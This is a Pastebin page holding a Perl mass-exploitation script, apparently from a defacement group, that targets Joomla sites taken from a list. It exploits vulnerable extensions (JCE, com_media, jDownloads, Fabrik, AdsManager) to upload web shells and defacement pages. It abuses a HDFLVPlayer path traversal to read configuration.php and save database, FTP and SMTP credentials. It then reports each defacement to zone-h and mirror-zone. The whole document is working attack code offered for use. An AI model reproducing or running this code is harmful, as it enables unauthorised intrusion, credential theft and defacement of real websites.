Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- use HTTP::Request;
- use LWP::UserAgent;
- use IO::Select;
- use HTTP::Response;
- use Term::ANSIColor;
- use HTTP::Request::Common qw(POST);
- use HTTP::Request::Common qw(GET);
- use URI::URL;
- use IO::Socket::INET;
- use Win32::Console::ANSI;
- my $datetime = localtime;
- $tmp="tmp";
- if (-e $tmp)
- {
- }
- else
- {
- mkdir $tmp or die "Error creating directory: $tmp";
- }
- $rez="Result";
- if (-e $rez)
- {
- }
- else
- {
- mkdir $rez or die "Error creating directory: $rez";
- }
- $logo="
- Jommla Bot
- ";
- print $logo;
- print "\t";
- print colored ("[ Code 4 Palestine |",'white on_black');
- print colored (" Love 4 Palestine |",'white on_green');
- print colored ("Life 4 Palestine ]",'white on_red'),"\n";
- print colored("[ GS-Bot Bazooka |Coded By Fallag Gassrini | Tunisian Fallaga Team ]",'white on_blue'),"\n\n\n";
- print colored ("Start At $datetime",'white on_red'),"\n\n";
- print "Enter Your Choose :";
- $a = <STDIN>;
- chomp $a;
- open(tarrget,"<$a") or die "Fuck you where is Website list -_- mafaka \n";
- while(<tarrget>){
- chomp($_);
- $site = $_;
- if($site !~ /http:\/\//) { $site = "http://$site/"; };
- efrez();
- }
- sub efrez($site){
- $ua = LWP::UserAgent->new(keep_alive => 1);
- $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
- $ua->timeout (10);
- my $efreez = $ua->get("$site")->content;
- if($efreez =~/<script type=\"text\/javascript\" src=\"\/media\/system\/js\/mootools.js\"><\/script>|Joomla!|Joomla|joomla/) {
- print colored("[JOOMLA] $site",'white on_magenta'),"\n\n\n";
- open(save, '>>tmp/joomla.txt');
- print save "$site\n";
- close(save);
- comjce();
- comediashell();
- comediaindex();
- comblog();
- comjdowloads();
- hdflvplayer();
- comfabr();
- indecomfabr();
- }
- }
- sub comjce($site){
- print colored ("[COM JCE]",'white on_red');
- $ua = LWP::UserAgent->new();
- $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
- $ua->timeout(15);
- $exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
- $vulnurl=$site.$exploiturl;
- $res = $ua->get($vulnurl)->content;
- if ($res =~ m/No function call specified!/i){
- open(save, '>>Result/vulntargets.txt');
- print save "[JCE] $site\n";
- close(save);
- print " .................. ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "VULN JCE";
- print color('reset');
- print color('bold white');
- print "] ";
- print color('reset');
- print "\n[UPLOADING PICTURE]";
- my $res = $ua->post($vulnurl,
- Content_Type => 'form-data',
- Content => [
- 'upload-dir' => './../../',
- 'upload-overwrite' => 0,
- 'Filedata' => ["md.gif"],
- 'action' => 'upload'
- ]
- )->decoded_content;
- if ($res =~ m/"error":false/i){
- }else{
- print " ......... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "PATCHED";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- }
- $remote = IO::Socket::INET->new(
- Proto=>'tcp',
- PeerAddr=>"$site",
- PeerPort=>80,
- Timeout=>15
- );
- $def= "$site/md.gif";
- $check = $ua->get($def)->status_line;
- if ($check =~ /200/){
- print " ......... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "DEFACED";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- print "[LINK] => $def\n";
- zoneh();
- mirrorzon();
- }
- }else{print " .................. ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold red');
- print "NOT VULN";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- }
- }
- sub comediashell($site){
- print "\n";
- print colored ("[COM MEDIA]",'white on_red');
- $tarmedia="$site/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=";
- $shlez = "md.PhP.txt";
- $shlz="$site/images/md.PhP.txt";
- $index="$site/gass.html";
- $ua = LWP::UserAgent->new;
- $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
- $sorm = $ua->get($tarmedia);
- $karza = $sorm->content;
- if($karza =~/<form action="(.*?)" id=\"uploadForm\" class=\"form-horizontal\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ || $karza =~ /<form action="(.*?)" id=\"uploadForm\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ )
- {
- $url = $1;
- $url =~ s/&/&/gi;
- print " .................... [VULN]\n[UPLOADING SHELL]";
- open(save, '>>Result/vulntargets.txt');
- print save "[Media] $site\n";
- close(save);
- my $res = $ua->post($url, Content_Type => 'form-data', Content => [ Filedata => [$shlez] ]);
- $check = $ua->get($shlz);
- if($check->content =~/MD-GHOST/ || $check->is_success ) {
- print" ........... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "SUCCESS";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- print colored ("[SHELL LINK] => $shlz",'white on_yellow'),"\n";
- open (TEXT, '>>Result/shells.txt');
- print TEXT "\n[ COM MEDIA SHELL] =>$shlz \n";
- close (TEXT);
- my $checkndex = $ua->get("$index")->content;
- if($checkndex=~/Hacked/){
- $def="$index";
- print colored ("[INDEX LINK] => $def",'white on_yellow'),"\n";
- zoneh();
- mirrorzon()
- }
- }
- }else{print " ................ ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold red');
- print "NOT VULN";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- }
- }
- sub comediaindex(){
- $shlez = "md.txt";
- $shlz="$site/images/md.txt";
- $ua = LWP::UserAgent->new;
- $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
- $sorm = $ua->get($tarmedia);
- $karza = $sorm->content;
- if($karza =~/<form action="(.*?)" id=\"uploadForm\" class=\"form-horizontal\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ || $karza =~ /<form action="(.*?)" id=\"uploadForm\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ )
- {
- $url = $1;
- $url =~ s/&/&/gi;
- print "\n[UPLOADING INDEX]";
- my $res = $ua->post($url, Content_Type => 'form-data', Content => [ Filedata => [$shlez] ]);
- $check = $ua->get($shlz);
- if($check->content =~/Hacked/ || $check->is_success ) {
- print " ........... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "DEFACED";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- print colored ("[INDEX LINK] => $shlz",'white on_yellow'),"\n";
- $def="$shlz";
- zoneh();
- mirrorzon()
- }
- }
- }
- sub comjdowloads($site){
- print colored ("[COM JDOWNLOADS]",'white on_red');
- $file="mdghost.rar";
- $filez="md.php.php.j";
- $jdup= $site . 'index.php?option=com_jdownloads&Itemid=0&view=upload';
- $shellpath= $site . '/images/jdownloads/screenshots/md.php.j';
- my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
- $ua->timeout(10);
- $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
- my $exploit = $ua->post("$jdup", Cookie => "", Content_Type => "form-data", Content => [ name=>"MD-GHOST", mail=>"fallagassrini@mail.com", filetitle =>"Fallaga Team", catlist=>"1", license=>"0", language=>"0", system=>"0",file_upload=>["$file"], pic_upload=>["$filez"], description=>"<p>zot</p>", senden=>"Send file", option=>"com_jdownloads", view=>"upload", send=>"1", "24c22896d6fe6977b731543b3e44c22f"=>"1"]);
- if ($exploit->decoded_content =~ /The file was successfully transferred to the server/) {
- print " ............... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "VULN";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- open(save, '>>Result/vulntargets.txt');
- print save "[jdown] $site\n";
- close(save);
- print "[SCANING SHELL] ................ ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold blue');
- print "WAIT";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- my $checkshell = $ua->get("$shellpath")->content;
- if($checkshell =~/Fallagassrini/) {
- print colored ("[SHELL LINK] => $shellpath",'white on_green'),"\n";
- open (TEXT, '>>Result/shells.txt');
- print TEXT "[ JDWN SHELL] => $shellpath\n";
- close (TEXT);
- }else{
- print "[ERROR] ................... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold red');
- print "SHELL 404";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- }
- print "[JDOWNLOAD INDEX]";
- $def = $site . '/images/jdownloads/screenshots/md.html.j';
- $filee="md.rar";
- $filezz="md.html.j";
- my $exploitx = $ua->post("$jdup", Cookie => "", Content_Type => "form-data", Content => [ name=>"MD-GHOST", mail=>"fallagassrini@gmail.com", filetitle =>"Fallaga Team", catlist=>"1", license=>"0", language=>"0", system=>"0",file_upload=>["$filee"], pic_upload=>["$filezz"], description=>"<p>zot</p>", senden=>"Send file", option=>"com_jdownloads", view=>"upload", send=>"1", "24c22896d6fe6977b731543b3e44c22f"=>"1"]);
- if ($exploit->decoded_content =~ /The file was successfully transferred to the server/) {
- print " ................ ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "OK";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- print "[SCANING INDEX] ................";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold blue');
- print "WAIT";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- my $response = $ua->get("$def")->status_line;
- if ($response =~ /200/){
- print "[DEFACE] .....................";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "SUCCESS";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- print colored ("[INDEX LINK] => $def",'white on_green'),"\n";
- zoneh();
- mirrorzon();
- }else{
- print "[DEFACE] .......................";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold red');
- print "ERROR";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- }
- }
- }else{ print " ........... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold red');
- print "NOT VULN";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- }
- }
- sub hdflvplayer($site){
- print colored ("[HDFLVPLAYER]",'white on_red');
- $conflink = "$site/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php";
- $ua = LWP::UserAgent->new(keep_alive => 1);
- $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
- $ua->timeout (10);
- $resp = $ua->request(HTTP::Request->new(GET => $conflink));
- $cont = $resp->content;
- if($cont =~ m/class JConfig|mosConfig_offline_message/g){
- print " .................. ",
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "VULN";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- open(save, '>>Result/vulntargets.txt');
- print save "[hdflv] $site\n";
- close(save);
- open (TEXT, '>>Result/databases.txt');
- print TEXT "$site\n[+]DATABASE INFO\n";
- close (TEXT);
- print color("white"),"\t[+]DATABASE INFO\n";
- if ($cont =~ /user = \'(.*?)\';/){
- print color("red"),"\t[-]Database User = $1 \n";
- print color 'reset';
- open (TEXT, '>>Result/databases.txt');
- print TEXT "[-]Database User = $1 \n";
- close (TEXT);
- }
- if ($cont =~ /password = \'(.*?)\';/){
- print color("red"),"\t[-]Database Password = $1 \n";
- print color 'reset';
- open (TEXT, '>>Result/databases.txt');
- print TEXT "[-]Database Password = $1\n";
- close (TEXT);
- }
- if ($cont =~ /db = \'(.*?)\';/){
- print color("red"),"\t[-]Database Name = $1 \n";
- print color 'reset';
- open (TEXT, '>>Result/databases.txt');
- print TEXT "[-]Database Name = $1\n";
- close (TEXT);
- }
- if ($cont =~ /host = \'(.*?)\';/){
- print color("red"),"\t[-]Database Host = $1 \n";
- print color 'reset';
- open (TEXT, '>>Result/databases.txt');
- print TEXT "[-]Database Host = $1\n";
- close (TEXT);
- }
- print color("white"),"\t[+] FTP INFO\n";
- if ($cont =~ /ftp_host = \'(.*?)\';/){
- print color("red"),"\t[-]FTP Host = $1 \n";
- print color 'reset';
- open (TEXT, '>>Result/databases.txt');
- print TEXT "\n[+] FTP INFO\n[-]FTP Host = $1\n";
- close (TEXT);
- }
- if ($cont =~ /ftp_port = \'(.*?)\';/){
- print color("red"),"\t[-]FTP Port = $1 \n";
- print color 'reset';
- open (TEXT, '>>Result/databases.txt');
- print TEXT "[-]FTP Port = $1\n";
- close (TEXT);
- }
- if ($cont =~ /ftp_user = \'(.*?)\';/){
- print color("red"),"\t[-]FTP User = $1 \n";
- print color 'reset';
- open (TEXT, '>>Result/databases.txt');
- print TEXT "[-]FTP User = $1\n";
- close (TEXT);
- }
- if ($cont =~ /ftp_pass = \'(.*?)\';/){
- print color("red"),"\t[-]FTP Pass = $1 \n";
- print color 'reset';
- open (TEXT, '>>Result/databases.txt');
- print TEXT "[-]FTP Pass = $1\n\n";
- close (TEXT);
- }
- print color("white"),"\t[+] SMTP INFO\n";
- if ($cont =~ /smtpuser = \'(.*?)\';/){
- print color("red"),"\t[-]SMTP User = $1 \n";
- print color 'reset';
- open (TEXT, '>>Result/databases.txt');
- print TEXT "[+] SMTP INFO\n[-]SMTP User = $1\n";
- close (TEXT);
- }
- if ($cont =~ /smtppass = \'(.*?)\';/){
- print color("red"),"\t[-]SMTP Password = $1 \n";
- print color 'reset';
- open (TEXT, '>>Result/databases.txt');
- print TEXT "[-]SMTP Password = $1\n";
- close (TEXT);
- }
- if ($cont =~ /smtpport = \'(.*?)\';/){
- print color("red"),"\t[-]SMTP Port = $1 \n";
- print color 'reset';
- open (TEXT, '>>Result/databases.txt');
- print TEXT "[-]SMTP Port = $1\n";
- close (TEXT);
- }
- if ($cont =~ /smtphost = \'(.*?)\';/){
- print color("red"),"\t[-]SMTP Host = $1 \n\n";
- print color 'reset';
- open (TEXT, '>>Result/databases.txt');
- print TEXT "[-]SMTP Host = $1\n";
- close (TEXT);
- }
- }else{print " .............. ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold red');
- print "NOT VULN";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- }
- }
- sub comfabr(){
- print colored ("[COM FABRIC]",'white on_red');
- $comfab= $site . '/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0';
- $def = $site . '/media/md.txt';
- $fabshell = $site . '/media/md.PhP.txt';
- $indfile="md.txt";
- $shelfile="md.PhP.txt";
- my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
- $ua->timeout(10);
- $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
- my $indfab = $ua->post("$comfab", Cookie => "", Content_Type => "form-data", Content => ["userfile" => ["$shelfile"], "name" => "me.php", "drop_data" => "1", "overwrite" => "1", "field_delimiter" => ",", "text_delimiter" => """, "option" => "com_fabrik", "controller" => "import", "view" => "import", "task" => "doimport", "Itemid" => "0", "tableid" => "0"]);
- my $checkfab = $ua->get("$fabshell")->content;
- if($checkfab =~/Fallagassrini/) {
- print " ................... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "VULN";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- open(save, '>>Result/vulntargets.txt');
- print save "[fabric] $site\n";
- close(save);
- print "[SHELL LINK] => $fabshell\n";
- open (TEXT, '>>Result/shells.txt');
- print TEXT "[COM FABRIC] =>$fabshell \n";
- close (TEXT);
- }else{
- print " ............... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold red');
- print "NOT VULN";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- }
- }
- sub indecomfabr(){
- print "[UPLOAD INDEX COM FABRIC] .......";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold blue');
- print "WAIT";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
- $ua->timeout(10);
- $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
- my $indfab = $ua->post("$comfab", Cookie => "", Content_Type => "form-data", Content => ["userfile" => ["$indfile"], "name" => "me.php", "drop_data" => "1", "overwrite" => "1", "field_delimiter" => ",", "text_delimiter" => """, "option" => "com_fabrik", "controller" => "import", "view" => "import", "task" => "doimport", "Itemid" => "0", "tableid" => "0"]);
- my $checkfab = $ua->get("$def")->content;
- if($checkfab =~/Hacked/) {
- open(save, '>>Result/vulntargets.txt');
- print save "[fabric] $site\n";
- close(save);
- print "[DEFACE] .................... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "SUCCESS";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- print "[INDEX LINK] => $def\n";
- zoneh();
- mirrorzon();
- }else{
- print "[DEFACE] ...................... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold red');
- print "ERROR";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- }
- }
- sub comusers(){
- print colored ("[COM USER SCANNER]",'white on_red');
- $ua = LWP::UserAgent->new(keep_alive => 1);
- $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
- $ua->timeout (20);
- my $exploit = "$site/index.php?option=com_users&view=registration";
- my $checkk = $ua->get("$exploit")->content;
- if($checkk =~/jform_email2-lbl/) {
- print" ............. ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "VULN";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- open(save, '>>Result/vulntargets.txt');
- print save "[users] $site\n";
- close(save);
- }else{
- print" ......... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold red');
- print "NOT VULN";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- }
- }
- sub comadsmanegr(){
- print colored ("[COM ADS MANAGER]",'white on_red');
- my $path = "/index.php?option=com_adsmanager&task=upload&tmpl=component";
- if($site !~ /http:\/\//) { $target = "http://$site/"; };
- my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
- $ua->timeout(10);
- $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
- my $exploit = $ua->post("$site/$path", Cookie => "", Content_Type => "form-data", Content => [file => ["def.jpg"], name => "xGassx.html"]);
- if ($exploit->decoded_content =~ /xGassx.html/) {
- print " .............. [VULN]\n";
- open(save, '>>Result/vulntargets.txt');
- print save "[ads] $site\n";
- close(save);
- print "[UPLOAD INDEX] ................... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "OK";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- $def="$site/tmp/plupload/xGassx.html";
- my $checkdef = $ua->get("$def")->content;
- if($checkdef =~/Hacked|Defaced|Fallag|Gassrini/) {
- print "[DEFACE] .................... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "SUCCESS";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- print "[INDEX LINK] => $def\n";
- zoneh();
- mirrorzon();
- adshell();
- }
- }else{print " .......... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold red');
- print "NOT VULN";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- }
- }
- sub adshell(){
- print "[UPLOAD SHELL] ................... ";
- my $path = "/index.php?option=com_adsmanager&task=upload&tmpl=component";
- my $exploitxx = $ua->post("$site/$path", Cookie => "", Content_Type => "form-data", Content => [file => ["loader.jpg"], name => "xGassrinix.php"]);
- if ($exploitxx->decoded_content =~ /xGassrinix.php/) {
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "OK";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- print "[SCANING SHELL] ................ ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold blue');
- print "WAIT";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- my $check = $ua->get("$site/tmp/plupload/xGassrinix.php")->content;
- my $checkk = $ua->get("$site/xGSx.php")->content;
- if($checkk =~/<form method=post>Password: <input type=password name=pass><input type=submit value=/) {
- print "[SHELL] ......................";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "SUCCESS";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- print "[SHELL LINK] => $site/xGSx.php\n";
- open(save, '>>Result/shells.txt');
- print save "[ADS] $site/xGSx.php\n";
- close(save);
- my $checkjo = $ua->get("$site/un.php")->content;
- if($checkjo =~ /path:(.*)<b><br>uname:(.*)<br><\/b>fallagateam/){
- print "\n";
- print colored ("[PATH] : $1",'black on_yellow'),"\n\n";
- print colored ("[KERNEL]:$2",'black on_yellow'),"\n";
- print "\n";
- open(save, '>>Result/shells.txt');
- print save "Path : $1\nKernel:$2\n";
- close(save);
- }
- }else{
- print "[SHELL] ........................";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "ERROR";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- }
- }
- }
- sub comblog(){
- print colored ("[COM BLOG SCANNER]",'white on_red');
- $uaa = LWP::UserAgent->new(keep_alive => 1);
- $uaa->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
- $uaa->timeout (10);
- my $exploitblog = "$site/index.php?option=com_myblog&task=ajaxupload";
- my $checkblog = $uaa->get("$exploitblog")->content;
- if($checkblog =~/has been uploaded/) {
- print" ............. ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "VULN";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- open(save, '>>Result/vulntargets.txt');
- print save "[blog] $site\n";
- close(save);
- print "[ $site EXPLOIT IT MANUEL ]\n";
- }
- else {print " ......... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold red');
- print "NOT VULN";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- }
- }
- sub zoneh(){
- print colored ("[ZONE-H]",'black on_yellow');
- open(save, '>>Result/index.txt');
- print save "$def\n";
- close(save);
- $hack="MD-GHOST";
- $zn="http://zone-h.org/notify/single";
- $lwp=LWP::UserAgent->new;
- $res=$lwp -> post($zn,[
- 'defacer' => $hack,
- 'domain1' => $def,
- 'hackmode' => '15',
- 'reason' => '1',
- 'submit' => 'Send',
- ]);
- if ($res->content =~ /color="red">ERROR<\/font><\/li>/) {
- print " ...................... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold red');
- print "ERROR";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- }
- elsif ($res->content =~ /color="red">OK<\/font><\/li>/) {
- print " ......................... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "OK";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- }
- else
- {
- print colored ("[ERROR !]Error Can't Submit it On Zone-h Gass",'white on_red'),"\n";
- }
- }
- sub mirrorzon(){
- print colored ("[MIRROR-ZONE]",'black on_yellow');
- $mz = "http://mirror-zone.org/notify/singel.php";
- $fgtn="MD-GHOST";
- $mzp = POST $mz, [hacker => $fgtn, text => $def];
- $response = $ua->request($mzp);
- if ($response->content =~ /Deface Add successfully added to Archive .../) {
- print " .................... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "OK";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- }else {
- print " ................. ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold red');
- print "ERROR";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement